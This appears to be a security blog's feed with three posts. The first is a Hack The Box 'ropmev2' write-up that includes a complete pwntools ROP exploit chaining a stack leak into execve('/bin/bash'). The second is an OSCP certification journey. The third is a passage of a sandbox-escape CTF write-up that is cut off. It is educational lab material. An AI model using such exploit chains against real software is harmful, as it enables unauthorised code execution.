https://fachrioktavian.github.io//blog/ Wed, 11 Jan 2023 08:08:58 +0000 Wed, 11 Jan 2023 08:08:58 +0000 Jekyll v3.9.2 <p><img src="/blog/images/posts/2020/htb_1_1.png" alt="ropmev2" title="ropmev2" width="600" /></p> <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/htb/challenge/pwn/ropmev2">https://github.com/fachrioktavian/ctf-writeup/tree/master/htb/challenge/pwn/ropmev2</a></p> <h3 id="summary">Summary</h3> <p>This is a nice pwn challenge. You will learn about ROP (Return Oriented Programming) technique in binary exploitation.</p> <h4 id="binarys-protection">Binary’s protection</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>checksec ropmev2 <span class="go">[*] '/media/sf_VMShared/htb/challenges/pwn/htb_ropmev2/ropmev2' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) </span></code></pre></div></div> <p>NX enabled means we can’t just place shellcode in the stack then execute it. NX (No Execute) will prevent a memory region to have both writable and executable access at the same time.</p> <h4 id="overview">Overview</h4> <p>After decompile the binary, here is snippet of main’s pseudocode:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">**</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rdx</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">[</span><span class="mi">26</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-D0h] -&gt; buffer has space of 26 bytes</span> <span class="n">sub_401213</span><span class="p">();</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Please dont hack me</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">500uLL</span><span class="p">);</span> <span class="c1">// read 500 bytes -&gt; OVERFLOW</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="s">"DEBUG</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buf</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"I dont know what this is %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">main</span><span class="p">(</span><span class="s">"I dont know what this is %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span> <span class="p">}</span> <span class="n">sub_401238</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">sub_401238</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+1Ch] [rbp-14h]</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span> <span class="p">)</span> <span class="p">{</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">strlen</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mh">0x60</span> <span class="o">||</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mh">0x6D</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mh">0x40</span> <span class="o">||</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mh">0x4D</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mh">0x6D</span> <span class="o">||</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mh">0x7A</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mh">0x4D</span> <span class="o">&amp;&amp;</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="mh">0x5A</span> <span class="p">)</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-=</span> <span class="mi">13</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-=</span> <span class="mi">13</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+=</span> <span class="mi">13</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">a1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+=</span> <span class="mi">13</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>So if we send string <code class="language-plaintext highlighter-rouge">DEBUG</code>, it’ll print address of buf. From here we get information leak of stack address, bypassing ASLR (Address Space Layout Randomozation). Then we exploit stack buffer overflow to gain RCE (Remote Code Execution) using ROP. Notice something at function <code class="language-plaintext highlighter-rouge">sub_401238()</code>? Yes this function will ruin out buffer, it’ll add or sub the bytes if the bytes match the criteria. But it’s easy to bypass, just place null <code class="language-plaintext highlighter-rouge">\x00</code> at front of buffer and this function will not work because <code class="language-plaintext highlighter-rouge">strlen()</code> funtion return length of a string just before null byte.</p> <h4 id="the-bugs">The bugs</h4> <p>First bug is information disclosure related to stack address. The second bug is overflow on the buffer <code class="language-plaintext highlighter-rouge">buf</code>.</p> <h4 id="exploitations-scenario">Exploitation’s scenario</h4> <ol> <li> <p>Leak stack address <code class="language-plaintext highlighter-rouge">DEBUG</code> command.</p> </li> <li> <p>Craft shellcode to call /bin/bash using available gadgets.</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="crash-the-binary">Crash the binary</h4> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># poc.py </span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">pad</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x00</span><span class="s">a0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"</span> <span class="n">r</span> <span class="o">=</span> <span class="n">gdb</span><span class="p">.</span><span class="n">debug</span><span class="p">(</span><span class="s">"./ropmev2"</span><span class="p">,</span> <span class="s">"b *0x40120C</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">pad</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>run the script and we can debug the binary and find pattern at <code class="language-plaintext highlighter-rouge">ret</code> instruction. Using <code class="language-plaintext highlighter-rouge">msf-patter_offset</code> we can find the exact offset to gain control of RIP.</p> <p><img src="/blog/images/posts/2020/htb_1_2.png" alt="pattern" title="pattern" style="width:450px;" /></p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>msf-pattern_offset <span class="nt">-q</span> 0x6841336841326841 <span class="go">[*] Exact match at offset 216 </span></code></pre></div></div> <h4 id="binbash-location">/bin/bash location.</h4> <p>Before we craft shellcode, we should know where the address of string <code class="language-plaintext highlighter-rouge">/bin/bash</code>. We can insert string <code class="language-plaintext highlighter-rouge">/bin/bash</code> into the stack and find the exact location of it using script below:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># poc.py </span><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">pload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">XXXXXXX"</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"/bin/bash</span><span class="se">\x00</span><span class="s">"</span> <span class="n">pload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span><span class="o">*</span><span class="p">(</span><span class="mi">216</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">pload</span><span class="p">))</span> <span class="o">+</span> <span class="n">pload</span> <span class="n">r</span> <span class="o">=</span> <span class="n">gdb</span><span class="p">.</span><span class="n">debug</span><span class="p">(</span><span class="s">"./ropmev2"</span><span class="p">,</span> <span class="s">"b *0x40120C</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"DEBUG"</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">())</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">pload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">python3 poc.py [!] Debugging process with ASLR disabled [+] Starting local process '/usr/bin/gdbserver': pid 2501 [*] running in new terminal: /usr/bin/gdb -q "./ropmev2" -x "/tmp/pwnws5e_l3m.gdb" b'Please dont hack me\n' [*] Switching to interactive mode I dont know what this is 0x7fffffffded0 Please dont hack me </span></code></pre></div></div> <p><img src="/blog/images/posts/2020/htb_1_3.png" alt="bash" title="bash" style="width:450px;" /></p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python <span class="go">Python 2.7.18 (default, Apr 20 2020, 20:30:41) [GCC 9.3.0] on linux2 Type "help", "copyright", "credits" or "license" for more information. </span><span class="gp">&gt;</span><span class="o">&gt;&gt;</span> 0x7fffffffded0 - 0x7fffffffdebe <span class="go">18 </span></code></pre></div></div> <h4 id="helpers">Helpers</h4> <p>Gadget can be found using tools like <code class="language-plaintext highlighter-rouge">ropper</code> or <code class="language-plaintext highlighter-rouge">ROPgadget</code></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pop_rdi_ret</span> <span class="o">=</span> <span class="mh">0x000000000040142b</span> <span class="c1"># pop rdi ; ret </span><span class="n">syscall</span> <span class="o">=</span> <span class="mh">0x0000000000401168</span> <span class="c1"># syscall </span><span class="n">pop_rax</span> <span class="o">=</span> <span class="mh">0x0000000000401162</span> <span class="c1"># pop rax ; ret </span><span class="n">pop_rsi_r15</span> <span class="o">=</span> <span class="mh">0x0000000000401429</span> <span class="c1"># pop rsi ; pop r15 ; ret </span><span class="n">pop_rdx_r13</span> <span class="o">=</span> <span class="mh">0x0000000000401164</span> <span class="c1"># pop rdx ; pop r13 ; ret </span></code></pre></div></div> <h4 id="stage-1-leaking-stack-address">Stage 1. Leaking stack address</h4> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">stage1</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"DEBUG"</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">pload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"this is "</span><span class="p">)</span> <span class="n">stack_leak</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:]</span> <span class="n">stack_leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">stack_leak</span><span class="p">,</span><span class="mi">16</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-2-building-rop-chain-to-trigger-rce">Stage 2. Building ROP chain to trigger RCE</h4> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">pad</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">XXXXXXX"</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"/bin/bash</span><span class="se">\x00</span><span class="s">"</span> <span class="n">pad</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span><span class="o">*</span><span class="p">(</span><span class="mi">216</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">pad</span><span class="p">))</span> <span class="o">+</span> <span class="n">pad</span> <span class="n">bin_bash</span> <span class="o">=</span> <span class="n">stack_leak</span> <span class="o">-</span> <span class="mh">0x12</span> <span class="n">stage2</span> <span class="o">=</span> <span class="n">pad</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_ret</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">bin_bash</span><span class="p">)</span> <span class="c1"># insert /bin/bash to rdi (argv[1]) </span><span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rsi_r15</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># insert null to rsi (argv[2]) </span><span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdx_r13</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># insert null to rdx (argv[3]) </span><span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rax</span><span class="p">)</span> <span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x3b</span><span class="p">)</span> <span class="c1"># insert 0x3b (syscall number for execve) to rax </span><span class="n">stage2</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">syscall</span><span class="p">)</span> <span class="c1"># trigger execve("/bin/bash", null, null) </span> <span class="n">r</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">stage2</span><span class="p">)</span> </code></pre></div></div> <h4 id="pwned">Pwned</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python3 solve.py <span class="go">[+] Starting local process './ropmev2': pid 2858 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Leaking stack address <span class="gp">[+] &gt;</span><span class="w"> </span>Stack leak: 0x7ffde9aff1f0, Address of <span class="s1">'/bin/bash'</span>: 0x7ffde9aff1de <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Building ROP to execute /bin/bash <span class="go">[+] Pwned! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),117(bluetooth),132(scanner),142(vboxsf) </span></code></pre></div></div> Wed, 27 May 2020 00:00:00 +0000 https://fachrioktavian.github.io//blog/htb/htb-ropmev2/ https://fachrioktavian.github.io//blog/htb/htb-ropmev2/ htb linux binary exploitation x64 stack buffer overflow return oriented programming htb <p><img src="/blog/images/posts/2020/other_1_1.png" alt="oscp_banner" title="oscp banner" width="600" /></p> <h2 id="try-harder-">Try Harder !!!</h2> <p>That’s what describe how i finally hand Offensive Security Certified Professional certificate. And that’s what you need too if you plan to take this course or still in the middle of the course: The “Try Harder” mental.</p> <h3 id="start-of-journey">Start of Journey</h3> <p>PWK (Course of OSCP certification) is a course that i’d wanted to take when i was still in college 4 years ago. So why just take it now? is it cost to much? YES IT DOES. But believe me, it just worth it.</p> <h4 id="oscps-student-registration">OSCP’s student registration</h4> <p>In Feb 25th 2020 i decided to register as OSCP’s student. Subscribed 2 months lab access cost me $1,199 or about Rp17,000,000 in my country and that was a lot of money thinking that a day before, it was only $999, just before PWK was updated to PWK2020. Good thing is it consists of many new materials including Active Directory which is not present before PWK2020.</p> <p>The registration was quite easy. I fill online form in Offensive Security website, then received some emails describing what should i do next to complete the registration. I need to prepare a valid legal ID e.g passport to acknoledge it was me who really take the course, reduce possible act of cheating.</p> <p><img src="/blog/images/posts/2020/other_1_2.png" alt="registration" title="registration success" /></p> <h4 id="vpn-connection-testing">VPN connection testing</h4> <p><img src="/blog/images/posts/2020/other_1_3.png" alt="testing_vpn" title="vpn connection testing" /></p> <p>Next OffSec guides me to test VPN connection to PWK lab, troubleshoots if comes any trouble while connecting to the network. Connect to PWK lab was done with openvpn. And yes i need fast and stable internet connection. Please do not use your smartphone as hotspot as connection, in the lab you will need to do various enumeration that need stable connection. Bad connection will interfere your enumeration process.</p> <h4 id="get-the-course-material">Get the course material</h4> <p><img src="/blog/images/posts/2020/other_1_4.png" alt="course_material" title="course material" /></p> <p>Upon the start of lab access at Mar 8th 2020, i received email containing course material in form of PDF and videos. it states that the link will expires in next 72 hours, additional copy in case i forgot to download will charges $199.</p> <h4 id="vmware-virtual-machine">VMware virtual machine</h4> <p>Before taking the course, i’ve prepared a clean installed Kali linux as dual boot in my notebook. However OffSec gave custom vmware virtual machine image that is enhanced for PWK course. That makes it easy for me to manage everything because i got many problems while installing Kali my notebook regarding drivers and compatibility hardware. I recommend using given Kali virtual machine to advance into the lab.</p> <p><img src="/blog/images/posts/2020/other_1_5.png" alt="vmware_machine" title="vmware machine" /></p> <h3 id="the-lab">The Lab</h3> <p>After watching some PWK videos, i realized that it will take long times to finish it all while lab time was running out. I’ve found and rooted some machine with same style like OSCP style in Hack The Box hacking platform, so it will be my first modal for the lab preparation. My strategy was going straight into the lab, if later find difficulties along the way, time to go back watch video and read course PDF.</p> <p>In the end, i successfully rooted 47 machines including several labs in subsubnet of public network. Here some tips for working on the labs:</p> <h4 id="leave-port-scanning-and-enumeration-running-at-night">Leave port scanning and enumeration running at night</h4> <p>First, i listed all machines from student’s control panel, then scheduled port scanning and enumeration using <a href="https://github.com/Tib3rius/AutoRecon">AutoRecon</a>. That’s a very good tool, saving your times for enumerating services, it automates everything, run it then start doing something else. Normally, i left it runs when i was going to bed, checked the result on the next day, and if there was finished job, start working on the machine which all service was enumerated. Repeat the process.</p> <h4 id="dont-stick-to-one-machine">Don’t stick to one machine</h4> <p>If you stuck on a machine, don’t force your body and brain to work on it. Yes you should have “Try Harder” mental, but it’s good to have “Try Smarter” too. Move aside for a moment, have a break, eat some candies and drink water, your brain needs calories and your body should stay hydrated. Try hack another machine, sometimes a way into machine A is revealed from machine B.</p> <h4 id="helpful-friend-is-on-the-forum">Helpful friend is on the forum</h4> <p>Forum is a good place for you to find some answer to what holding you back in the lab. I asked something about the machine behavior and but not the way to hack the lab explicitly. The problems may come from exploit codes that need to enhanced a bit, it’s okay to ask about it. People in forum may tell you that you need to edit something in order to make it work without ruining your joy by spoil you the credential or the complete walkthrough.</p> <h4 id="friend-outside-the-forum-maybe-helpful-too">Friend outside the forum maybe helpful too</h4> <p>I have friends who already passed the OSCP certification, they are live PWK course. They help me providing some tips how to tackle obstacles in PWK lab.</p> <h4 id="you-dont-have-to-rooted-all-machines-in-the-lab">You don’t have to rooted all machines in the lab</h4> <p>There are many machines in the lab, especially PWK2020. You can see in the OffSec site there is additional 30% of course materials and lab machines. Previously, i had ambition to rooted all the machines, but actually it was not required to rooted them all. OffSec just need writeup of 10 lab’s machine minimum + course PDF tasks to get addtional 5 points for exam result which later i didn’t submit the lab report due to the amount of course PDF’s tasks that are so many. The important thing is you learn how to hack them, the process of enumeration, the pace, and the time strategy are valuable things you need for the exam and for real life penetration testing too.</p> <h4 id="take-notes">Take notes</h4> <p>I used Visual Studio Codes to create documentations for every rooted machine, that was a good way to review again some techniques i had done before. There are many tool for documentation, sublime, one note, cherry tree, etc. Take notes for every command you use. And bookmark all webpage regarding HowTos, tutorial, and anything related to the machine.</p> <p><img src="/blog/images/posts/2020/other_1_7.png" alt="take_notes" title="take notes" style="width:300px;" /></p> <h4 id="create-write-ups-for-every-rooted-machine">Create write-ups for every rooted machine</h4> <p>I created write-up for every machine i rooted. For some people, maybe creating documentation in detail is a boring activity, but for OSCP, you should get used to it. Even if you root all machines in Exam, but with no write-ups means no points for you, means you fail it.</p> <h4 id="enjoy-the-process">Enjoy the process</h4> <p>Enjoy the learning process, the progress you’ve gotten from zero to little hero, from little hero to hero. Do not focus on the result, even the exam demands result, but the lab time is the study time, keep learn something, don’t stop until the lab time is over.</p> <h4 id="read-others-oscp-notes">Read other’s OSCP notes</h4> <p>There are many notes, blogs, and tutorials available online that you can read and implement it in your lab. eg: <a href="https://sushant747.gitbooks.io/total-oscp-guide/">sushant747.gitbooks.io</a>, <a href="https://securism.wordpress.com/oscp-notes-exploitation/">securism.wordpress.com</a>, <a href="https://book.hacktricks.xyz/">book.hacktricks.xyz</a>, and many more.</p> <h3 id="oscp-exam">OSCP Exam</h3> <p><img src="/blog/images/posts/2020/other_1_6.png" alt="oscp_exam" title="oscp exam" /></p> <p>My OSCP exam is scheduled at May 19th, 04:00. Yes 4 o’clock in the morning. I woke up at 03:00, take a shower, made a hot drink, and prepared snack. 15 minutes before the exam, i logged into proctoring webapps by OffSec. The proctor then asked me to show ID and what was around me. At 04:00 i received VPN connection to exam lab and my 23 hourse 45 minutes exam time was started.</p> <p>I have 5 machines in the exam need to owned. 2 machines @ 25 points, 2 machines @ 20 points, and 1 @ 10 points with total points of 100. The minimum points to pass the exam is 70.</p> <p>First machine i owned was buffer overflow machine @ 25 points. While doing exploit development, i left AutoRecon runs on the background to enumerates and scans services of 4 other machines. I finished owned BOF machine in an hour.</p> <p>The next machine i targeted was 10 points machine. I thought it was an easy machine, turned out i spent 2 hours and get nothing. The exploit is available on the web, but try various versions of it didn’t give me reverse shell. Maybe it was time to break, so i told the proctor i need to step aside from the monitor, drank water, got scretch and had a breakfast. An hour later i felt fresh again.</p> <p>Back to my desk, told proctor i was ready to continue the exam then try a 20 points machine. Owned it about 2 hours later. So far i handed 45 points. After that i tried to continue my luck on 10 points machine. Decided to use forbidden tool aka metasploit and got the reverse shell instantly. I was very happy at that time thought my decision was right because i only got one chance to use metasploit, wether it success or not i couldn’t use metasploit again on other machine. So far i handed 55 points and still have 12 hours to go. I took a break and lunch.</p> <p>6 hours later i spent for 25 points machine. I found that this machine was easier than the 20 points one. Owned it and handed 80 points and 6 hours exam time left. That time i felt very relieved. I decided to use next 6 hours for writing documentation than continued to persue the 20 points machine. The target is to pass the minimum exam points, not to get full points. Last one hour i finally done all the documentation with 80 confident points. Such a nice experience :) even i didn’t take a nap or sleep at night, stay awake for almost 24 hours.</p> <p>After submitting the documentation, OffSec sent me a receipt of submitted document. At May 24th 2020 12:59 AM i received email from OffSec told me that i have successfully completed the PWK course and granted OSCP certification.</p> <p><img src="/blog/images/posts/2020/other_1_8.png" alt="oscp_success" title="oscp success" /></p> <h3 id="last-word">Last Word</h3> <p>PWK/OSCP is one of many security related course/certification out there. I can’t compare it to another because this is my first certification. But after taking the course, i get many new knowledges, especially the pace to successfully exploit any target and “Try Harder” mental that actually become a mantra, a mantra to not give up on every situation, not only in hacking term but also in my real life itself :)</p> <p><img src="/blog/images/posts/2020/other_1_9.png" alt="quote" title="quote" /></p> Wed, 27 May 2020 00:00:00 +0000 https://fachrioktavian.github.io//blog/other/oscp_journey/ https://fachrioktavian.github.io//blog/other/oscp_journey/ oscp linux windows other <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/kksiquals19/sandbox2">https://github.com/fachrioktavian/ctf-writeup/tree/master/kksiquals19/sandbox2</a></p> <h3 id="summary">Summary</h3> <p>This is a sandbox escape challenge, got from KKSI CTF Quals 2019.</p> <h4 id="overview">Overview</h4> <p>This is a simple sandbox binary, it asks input from user. Those input then will be executed as a code.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"&gt; "</span><span class="p">,</span> <span class="mi">0LL</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">,</span> <span class="mi">17uLL</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mh">0x10</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="mi">15</span> <span class="o">&amp;&amp;</span> <span class="n">shellcode</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">5</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"[*] blocked !"</span><span class="p">);</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="n">install_syscall_filter</span><span class="p">();</span> <span class="p">(</span><span class="o">*</span><span class="n">shellcode</span><span class="p">)(</span><span class="mi">0LL</span><span class="p">,</span> <span class="n">shellcode</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ ./sandbox2 </span><span class="gp">&gt;</span><span class="w"> </span>asd <span class="go">[1] 22650 illegal hardware instruction (core dumped) ./sandbox2 </span></code></pre></div></div> <p>Its limitation is we can only submit a maximum 17 bytes of shellcode and seccomp protection is applied to the binary. We can’t use some syscalls in the shellcode.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ seccomp-tools dump sandbox2 </span><span class="gp">&gt;</span><span class="w"> </span><span class="go"> line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003 0002: 0x06 0x00 0x00 0x00000000 return KILL 0003: 0x20 0x00 0x00 0x00000000 A = sys_number 0004: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0006 0005: 0x06 0x00 0x00 0x00000000 return KILL 0006: 0x15 0x00 0x01 0x00000039 if (A != fork) goto 0008 0007: 0x06 0x00 0x00 0x00000000 return KILL 0008: 0x15 